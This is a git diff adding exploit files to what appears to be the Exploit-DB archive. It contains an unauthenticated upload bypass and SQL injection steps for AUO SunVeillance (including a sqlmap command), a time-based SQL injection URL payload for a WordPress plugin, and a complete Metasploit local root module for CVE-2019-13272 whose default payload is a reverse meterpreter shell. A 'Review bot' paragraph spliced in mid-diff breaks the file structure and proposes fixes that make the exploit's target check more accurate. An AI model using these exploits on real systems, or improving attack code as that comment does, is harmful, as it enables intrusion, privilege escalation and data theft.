diff --git a/exploits/hardware/webapps/47541.txt b/exploits/hardware/webapps/47541.txt
new file mode 100644
index 000000000..0b82dd77b
--- /dev/null
+++ b/exploits/hardware/webapps/47541.txt
@@ -0,0 +1,23 @@
+# Exploit Title: AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control
+# Date: 2019-10-24
+# Exploit Author: Luca.Chiou
+# Vendor Homepage: https://www.auo.com/zh-TW
+# Version: AUO SunVeillance Monitoring System all versions prior to v1.1.9e
+# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
+# CVE: N/A
+
+# 1. Description:
+# An issue was discovered in AUO SunVeillance Monitoring System.
+# There is an incorrect access control vulnerability that can allow the attacker to
+# bypass the authentication mechanism, and upload files to the server without any authentication.
+
+# 2. Proof of Concept:
+(1) Access the picture management page of AUO SunVeillance Monitoring System (/Solar_Web_Portal/Picture_Manage_mvc.aspx) without
+ any authentication. As a guest role, user is not allowed to upload a picture. However, there are two parameters, Act and authority, in Picture_Manage_mvc.aspx.
+(2) Modify the value of parameter authority from 40 to 100. You can find out the upload button is enabled.
+(3) Now you can upload a file successfully.
+(4) The file which we uploaded is storing in server side. It’s means any user without authentication can upload files to server side.
+
+Thank you for your kind assistance.
+
+Luca
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47542.txt b/exploits/hardware/webapps/47542.txt
new file mode 100644
index 000000000..adbd3ae74
--- /dev/null
+++ b/exploits/hardware/webapps/47542.txt
@@ -0,0 +1,31 @@
+# Exploit Title: AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection
+# Date: 2019-10-24
+# Exploit Author: Luca.Chiou
+# Vendor Homepage: https://www.auo.com/zh-TW
+# Version: AUO SunVeillance Monitoring System all versions prior to v1.1.9e
+# Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index
+# CVE: N/A
+
+# 1. Description:
+# AUO SunVeillance Monitoring System all versions prior to v1.1.9e that is vulnerable to SQL Injection.
+# The vulnerability can allow the attacker inject maliciously SQL command to the server which allows
+# the attacker to read privileged data.
+
+# 2. Proof of Concept:
+
+(1) Access the sending mail page of AUO SunVeillance Monitoring System (/Solar_Web_Portal/mvc_send_mail.aspx) without any authentication.
+ There is a parameter, MailAdd, in mvc_send_mail.aspx.
+(2) Modify the value of parameter MailAdd with single quotation. The error messages contains oracle database information.
+(3) By using sqlmap tools, attacker can acquire the database list which in server side.
+
+cmd: sqlmap.py -u “https:///Solar_Web_Portal/mvc_send_mail.aspx?MailAdd=” -p MailAdd –dbs
+
+(4) Furthermore, there are a few SQL Injection vulnerabilities in other fields.
+
+picture_manage_mvc.aspx (parameter: plant_no)
+swapdl_mvc.aspx (parameter: plant_no)
+account_management.aspx (parameter: Text_Postal_Code, Text_Dis_Code)
+
+Thank you for your kind assistance.
+
+Luca
\ No newline at end of file
diff --git a/exploits/linux/local/47543.rb b/exploits/linux/local/47543.rb
new file mode 100755
index 000000000..c3885778f
--- /dev/null
+++ b/exploits/linux/local/47543.rb
@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::File
+ include Msf::Post::Linux::Priv
+ include Msf::Post::Linux::Kernel
+ include Msf::Post::Linux::System
+ include Msf::Post::Linux::Compile
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Linux Polkit pkexec helper PTRACE_TRACEME local root exploit',
+ 'Description' => %q{
+ This module exploits an issue in ptrace_link in kernel/ptrace.c before Linux
+ kernel 5.1.17. This issue can be exploited from a Linux desktop terminal, but
+ not over an SSH session, as it requires execution from within the context of
+ a user with an active Polkit agent.
+ In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles
+ the recording of the credentials of a process that wants to create a ptrace
+ relationship, which allows local users to obtain root access by leveraging
+ certain scenarios with a parent-child process relationship, where a parent drops
+ privileges and calls execve (potentially allowing control by an attacker). One
+ contributing factor is an object lifetime issue (which can also cause a panic).
+ Another contributing factor is incorrect marking of a ptrace relationship as
+ privileged, which is exploitable through (for example) Polkit's pkexec helper
+ with PTRACE_TRACEME.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'Jann Horn', # Discovery and exploit
+ 'bcoles', # Metasploit module
+ 'timwr', # Metasploit module
+ ],
+ 'References' => [
+ ['CVE', '2019-13272'],
+ ['EDB', '47133'],
+ ['PACKETSTORM', '153663'],
+ ['URL', 'https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272'],
+ ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1903'],
+ ],
+ 'SessionTypes' => [ 'shell', 'meterpreter' ],
+ 'Platform' => [ 'linux' ],
+ 'Arch' => [ ARCH_X64 ],
+ 'Targets' => [[ 'Auto', {} ]],
+ 'DefaultOptions' =>
+ {
+ 'Payload' => 'linux/x64/meterpreter/reverse_tcp',
+ 'PrependFork' => true,
+ },
+ 'DisclosureDate' => 'Jul 4 2019'))
+ register_advanced_options [
+ OptBool.new('ForceExploit', [false, 'Override check result', false]),
+ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+ ]
+ end
+
+ def check
+ # Introduced in 4.10, but also backported
+ # Patched in 4.4.185, 4.9.185, 4.14.133, 4.19.58, 5.1.17
+ release = kernel_release
+ v = Gem::Version.new release.split('-').first
+
+ if v >= Gem::Version.new('5.1.17') || v < Gem::Version.new('3')
+ vprint_error "Kernel version #{release} is not vulnerable"
+ return CheckCode::Safe
+ end
+ vprint_good "Kernel version #{release} appears to be vulnerable"
+
+ unless command_exists? 'pkexec'
+ vprint_error 'pkexec is not installed'
+ return CheckCode::Safe
+ end
+ vprint_good 'pkexec is installed'
+
+ arch = kernel_hardware
+ unless arch.include? 'x86_64'
+ vprint_error "System architecture #{arch} is not supported"
+ return CheckCode::Safe
+ end
+ vprint_good "System architecture #{arch} is supported"
+
+ loginctl_output = cmd_exec('loginctl --no-ask-password show-session "$XDG_SESSION_ID" | grep Remote')
+ if loginctl_output =~ /Remote=yes/
+ print_warning 'This is exploit requires a valid policykit session (it cannot be executed over ssh)'
+ return CheckCode::Safe
+ end
+
+ CheckCode::Appears
+ end
+
+ def exploit
+ if is_root? && !datastore['ForceExploit']
+ fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+ end
+
+ unless check == CheckCode::Appears
+ unless datastore['ForceExploit']
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+ end
+ print_warning 'Target does not appear to be vulnerable'
+ end
+
+ unless writable? datastore['WritableDir']
+ fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
+ end
+
+ payload_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
+ upload_and_chmodx(payload_file, generate_payload_exe)
+ register_file_for_cleanup(payload_file)
+
+ exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
+ if live_compile?
+ vprint_status 'Live compiling exploit on system...'
+ upload_and_compile exploit_file, exploit_data('CVE-2019-13272', 'poc.c')
+ else
+ vprint_status 'Dropping pre-compiled exploit on system...'
+ upload_and_chmodx exploit_file, exploit_data('CVE-2019-13272', 'exploit')
+ end
+ register_file_for_cleanup(exploit_file)
+
+ print_status("Executing exploit '#{exploit_file}'")
+ result = cmd_exec("echo #{payload_file} | #{exploit_file}")
+ print_status("Exploit result:\n#{result}")
+ end
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/47540.txt b/exploits/php/webapps/47540.txt
new file mode 100644
index 000000000..f682bee16
--- /dev/null
+++ b/exploits/php/webapps/47540.txt
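Review bot: The kernel version gate in `check`, `if v >= Gem::Version.new('5.1.17') || v < Gem::Version.new('3')`, contradicts the comment two lines above it: stable kernels fixed at 4.4.185, 4.9.185, 4.14.133 and 4.19.58 all satisfy `v < 5.1.17` and are reported as `CheckCode::Appears`, so `exploit` goes on to drop and run the binary on hosts that are already patched. Keeping the existing condition and additionally comparing against the fix release of the kernel's own major.minor series would make the code match the comment, e.g. `patched = { '4.4' => '4.4.185', '4.9' => '4.9.185', '4.14' => '4.14.133', '4.19' => '4.19.58', '5.1' => '5.1.17' }`, `fixed = patched[v.segments.first(2).join('.')]`, `return CheckCode::Safe if fixed && v >= Gem::Version.new(fixed)`; distributions that backport the fix without bumping the version string are still not detectable this way, which is worth stating in the comment since it is what ForceExploit exists for. Separately, `cmd_exec("echo #{payload_file} | #{exploit_file}")` interpolates two paths derived from the operator-supplied WritableDir without quoting, so a directory containing a space breaks the pipeline; single-quoting both paths in the command string keeps it intact.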
@@ -0,0 +1,19 @@
+# Exploit Title: Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection
+# Date: 2019-10-22
+# Exploit Author: Lucian Ioan Nitescu
+# Contact: https://twitter.com/LucianNitescu
+# Webiste: https://nitesculucian.github.io
+# Vendor Homepage: https://slicedinvoices.com/
+# Software Link: https://wordpress.org/plugins/sliced-invoices/
+# Version: 3.8.2
+# Tested on: Ubuntu 18.04 / Wordpress 5.3
+
+# 1. Description:
+# Wordpress Sliced Invoices plugin with a version lower then 3.8.2 is affected
+# by an Authenticated SQL Injection vulnerability.
+
+# 2. Proof of Concept:
+# Authenticated SQL Injection:
+- Using an Wordpress user, access /wp-admin/admin.php?action=duplicate_quote_invoice&post=8%20and%20(select*from(select(sleep(20)))a)--%20
+- The response will be returned after 20 seconds proving the successful exploitation of the vulnerability.
+- Sqlmap can be used to further exploit the vulnerability.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index dbb1faa89..c9d266d08 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10732,6 +10732,7 @@ id,file,description,date,author,type,platform,port
 47527,exploits/windows/local/47527.txt,"Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution",2019-10-21,hyp3rlinx,local,windows,
 47529,exploits/solaris/local/47529.txt,"Solaris 11.4 - xscreensaver Privilege Escalation",2019-10-21,"Marco Ivaldi",local,solaris,
 47538,exploits/windows/local/47538.txt,"IObit Uninstaller 9.1.0.8 - 'IObitUnSvr' Unquoted Service Path",2019-10-23,"Sainadh Jamalpur",local,windows,
+47543,exploits/linux/local/47543.rb,"Linux Polkit - pkexec helper PTRACE_TRACEME local root (Metasploit)",2019-10-24,Metasploit,local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41858,3 +41859,6 @@ id,file,description,date,author,type,platform,port
 47524,exploits/php/webapps/47524.py,"Joomla! 3.4.6 - Remote Code Execution",2019-10-18,"Alessandro Groppo",webapps,php,
 47537,exploits/linux/webapps/47537.txt,"Rocket.Chat 2.1.0 - Cross-Site Scripting",2019-10-23,3H34N,webapps,linux,
 47539,exploits/php/webapps/47539.rb,"Joomla! 3.4.6 - Remote Code Execution (Metasploit)",2019-10-23,"Alessandro Groppo",webapps,php,
+47540,exploits/php/webapps/47540.txt,"Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection",2019-10-24,"Lucian Ioan Nitescu",webapps,php,
+47541,exploits/hardware/webapps/47541.txt,"AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control",2019-10-24,Luca.Chiou,webapps,hardware,
+47542,exploits/hardware/webapps/47542.txt,"AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection",2019-10-24,Luca.Chiou,webapps,hardware,